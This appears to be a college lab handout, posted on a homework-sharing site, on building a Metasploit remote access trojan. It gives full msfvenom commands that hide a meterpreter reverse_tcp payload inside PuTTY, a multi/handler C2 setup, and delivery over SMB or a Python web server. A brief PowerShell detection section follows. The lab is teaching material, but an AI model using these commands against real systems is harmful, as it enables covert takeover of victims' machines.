[Lab-Pentest] Metasploit RAT

docx

School

Madison Area Technical College, Madison *

*We aren’t endorsed by this school

Course

804-208

Subject

Computer Science

Date

Dec 6, 2023

Type

docx

Pages

9

Uploaded by LavonCN

Report
[Lab-Pentest] Metasploit RAT Introduction A Remote Access Trojan (RAT) is an application that hackers use to covertly control a targeted machine. In this lab we use msfvenom to create a RAT. We will use msfconsole to create a handler to receive incoming connections from our RAT and interact with the targeted machine. For this lab Windows 2008RC2 and Windows 10 are the target systems. The Kali Linux machine is the attacker. There are three stages to this type of attack. The first is to create a malicious executable, Next we deploy the RAT to the target machine. Finally, we wait for the target to connect back to the attacking system. Background The following sections provide information about your payloads. 32-bit or 64-bit: The sample executable could be compiled as either a 32-bit or 64-bit application. If we try to build our trojan using the wrong format our back door will not work. The Windows PE (Portable Executable) format has many different machine types but we are only concerned with two. Content Value Description IMAGE_FILE_MACHINE_AMD64 0x8664 [6486] x64 IMAGE_FILE_MACHINE_I386 0x14c [ 4c01] Intel 386 or later processors and compatible processors We need to check if the executable we downloaded is 64 or 32 bits. A quick and easy way to do this is using hexdump (this comes already installed on Kali Linux). hexdump -C -n 200 <base file>.exe What we are looking for is the line that contains “PE” (Note: This line can be in different places so run hexdump and look for it).
32-bit Executable: A 32-bit executable will have the pattern [50 45 00 00 4c 01] on the same line that has the letters PE. 64-bit Executable: A 64-bit executable will have the pattern [50 45 00 00 64 86] on the same line that has the letters PE. Lab Activities The following sections walk you through the process of building a RAT, deploying it to your target and executing it to deliver your payload. Build the trojan into the base executable: Depending on the architecture of our target, we need to select a payload that matches. Note: You will run into problems if you try to put a 64-bit payload into a 32-bit executable or try to execute a 32-bit payload on a 64-bit architecture. MSFVenom Metasploits standalone payload generator. We use this when we want to make file based metasploit payloads. Payloads can also be created in the msfconsole but a few key features are missing in that interface to make it ideal for file based executables (No --keep option). Just to keep things organized it is usually a good idea to make a special directory to build you trojan executables in (don't want to lose track of these ;) ) To review all of the available payload options, execute msfvenom with the --payload- options argument. msfvenom --payload-options -p windows/x64/meterpreter/reverse_tcp For this lab, the following options will be used to generate the malicious version of Putty.
-a [--arch] = The architecture to use --platform = The platform of the payload -p [--payload] = Payload to use. -e [--encoder] = The encoder to use -i [--iterations] = The number of times to encode the payload -f [--format] = Output format (use --help-formats for a list) -x [--template] = Specify a custom executable file to use as a template -o [--out] = Save the payload to <filename> -k [--keep] = Preserve the template behavior For a Windows x64 [64-bit] Note: You must use a 64-bit application template! msfvenom -a x64 --platform windows -x putty-64.exe -k -p windows/x64/meterpreter/reverse_tcp lhost=192.168.1.10 lport=31337 -f exe -o putty-backdoor.exe For Windows x86 [32-bit] Note: You must use a 32-bit application template! msfvenom -a x86 --platform windows -x putty-32.exe -k -p windows/meterpreter/reverse_tcp lhost=192.168.1.10 lport=31337 -e x86/shikata_ga_nai -i 3 -f exe -o putty-backdoor.exe Command and Control Server [C2] We need a way to control the target system once we have our RAT running on it. Metasploit Framework provides the exploit/multi/handler module for this purpose. Metasploit Handler The metasploit multi-handler is a generic server that we assign different behavior based on the PAYLOAD we define. In this case we are telling it to create a server and configure it to listen on port 5000 for a “meterpreter/reverse_tcp” connection. msf> use exploit/multi/handler msf exploit(multi/handler) set PAYLOAD windows/x64/meterpreter/reverse_tcp msf exploit(multi/handler) set LHOST 192.168.1.10 msf exploit(multi/handler) set LPORT 31337
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
  • Access to all documents
  • Unlimited textbook solutions
  • 24/7 expert homework help
msf exploit(multi/handler) run We are now ready to receive connections from our RAT. Next, we need to deploy the RAT to the target system. Deploy the RAT The following sections discuss two techniques to move your RAT onto the target system. Using SMBClient The smbclient utility can be used to move files onto a Windows system that exposes the SMB service. Not that this technique will not work for systems that are filtering inbound SMB connections using a host-based firewall. To begin, change to the directory on your Kali system that contains your malicious executables. [kali] cd ~/assessments/malware/ Next, connect to the target system using the smbclient command in Kali. [kali] smbclient \\\\192.168.1.1\\c$ -U Administrator Enter Workgroup\Administrator’s password: smb: \> Finally, upload your malicious executable to the target system. smb: \> put putty-backdoor.exe smb: \> exit In general, this interaction is similar to a typical FTP transfer with the main difference being the use of SMB instead of FTP. At this point, you have uploaded your malicious executable to the root of the filesystem on the Windows 2008RC2 target. Using Python3’s HTTP Server At this point we have produced an executable file that we will need to get onto the target machine and execute. To accomplish this we will use the HTTP server available as a Python3 module. Ensure you are in the directory that contains the executables you generated using msfvenom and execute the python module. [kali] cd /root/backdoors [kali] python -m http.server
By default, the Python web server will listen on TCP port 8000. To copy the malicious executable to our target, we will need to use a web browser on the target system. On the targeted system: Execute the trojan To execute the RAT on the target system you can either double-click on it in a GUI, or execute it directly from a command shell. Executing the backdoor from the Windows command shell. C:\ putty-backdoor.exe Once executed, you should see a new session created in the Metasploit Framework on the Kali system. At this point you have built a malicious executable, delivered it to your target system, executed it and received a reverse TCP connection to interact with your payload on the target. Lab Activities To complete this lab you will be generating two new versions of Putty that include your backdoor. You can find the current release version of Putty here: https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html Your targets are ANY of the Windows machines. Follow the steps outlined previously to complete the lab.
Windows Target (Your Choice) [ INSERT A SCREENSHOT OF YOUR METERPRETER SESSIONS ] [ INSERT A SCREENSHOT OF THE PUTTY EXECUTABLE RUNNING ON WINDOWS ]
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
  • Access to all documents
  • Unlimited textbook solutions
  • 24/7 expert homework help
Detection and analysis We can use some quick powershell commands to study the process that is connecting up to our attacker machine. Type powershell in the Windows 10 search bar and select Windows Powershell Next find all of the connections going to our attacker machine. This command will show us the process ID that is creating the connection to our attacker machine Note: We can tell what time/date the trojan application started the connection. Get-NetTCPConnection -RemoteAddress 192.168.1.3 | Format-List
Using the process ID we can get a bunch more information about the trojan process. Get-Process -Id <process number> | Format-List * And finally we can kill the rogue process and break the attacker’s connection. Stop-Process -Id 5272
Reference: How to use MSFVenom https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom Payload Generation https://www.offensive-security.com/metasploit-unleashed/generating-payloads/ Windows PE (Portable Executable) documentation https://msdn.microsoft.com/en-us/library/windows/desktop/ms680547(v=vs.85).aspx
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
  • Access to all documents
  • Unlimited textbook solutions
  • 24/7 expert homework help

Related Documents

WINP1008 Lab 1 - Install Windows 10 Operating System - v3 Fall2023.docx
Murder Investigation and Temperature Convergence.docx
FD_practice.pdf
FD_practice_key_part1.pdf
IT234_Jose Gonzalez_Unit6.docx
Midterm Marketing Project Instructions_V1 (2).docx
Practice Q&A Questions.pdf
CIS-217ProjectPart1.pdf
Assignment 5 - Jonatan.pdf
CIS-217ProjectPart3.pdf
Discussion 7 post.docx
CIS-217ProjectPart2.pdf
Recommended textbooks for you
Text book image
Systems Architecture
Computer Science
ISBN:9781305080195
Author:Stephen D. Burd
Publisher:Cengage Learning
Text book image
Microsoft Windows 10 Comprehensive 2019
Computer Science
ISBN:9780357392607
Author:FREUND
Publisher:Cengage
Text book image
A+ Guide To It Technical Support
Computer Science
ISBN:9780357108291
Author:ANDREWS, Jean.
Publisher:Cengage,
Text book image
LINUX+ AND LPIC-1 GDE.TO LINUX CERTIF.
Computer Science
ISBN:9781337569798
Author:ECKERT
Publisher:CENGAGE L
Text book image
CompTIA Linux+ Guide to Linux Certification (Mind...
Computer Science
ISBN:9781305107168
Author:Jason Eckert
Publisher:Cengage Learning
Text book image
Fundamentals of Information Systems
Computer Science
ISBN:9781337097536
Author:Ralph Stair, George Reynolds
Publisher:Cengage Learning
SEE MORE TEXTBOOKS
Recommended textbooks for you
Text book image
Systems Architecture
Computer Science
ISBN:9781305080195
Author:Stephen D. Burd
Publisher:Cengage Learning
Text book image
Microsoft Windows 10 Comprehensive 2019
Computer Science
ISBN:9780357392607
Author:FREUND
Publisher:Cengage
Text book image
A+ Guide To It Technical Support
Computer Science
ISBN:9780357108291
Author:ANDREWS, Jean.
Publisher:Cengage,
Text book image
LINUX+ AND LPIC-1 GDE.TO LINUX CERTIF.
Computer Science
ISBN:9781337569798
Author:ECKERT
Publisher:CENGAGE L
Text book image
CompTIA Linux+ Guide to Linux Certification (Mind...
Computer Science
ISBN:9781305107168
Author:Jason Eckert
Publisher:Cengage Learning
Text book image
Fundamentals of Information Systems
Computer Science
ISBN:9781337097536
Author:Ralph Stair, George Reynolds
Publisher:Cengage Learning
SEE MORE TEXTBOOKS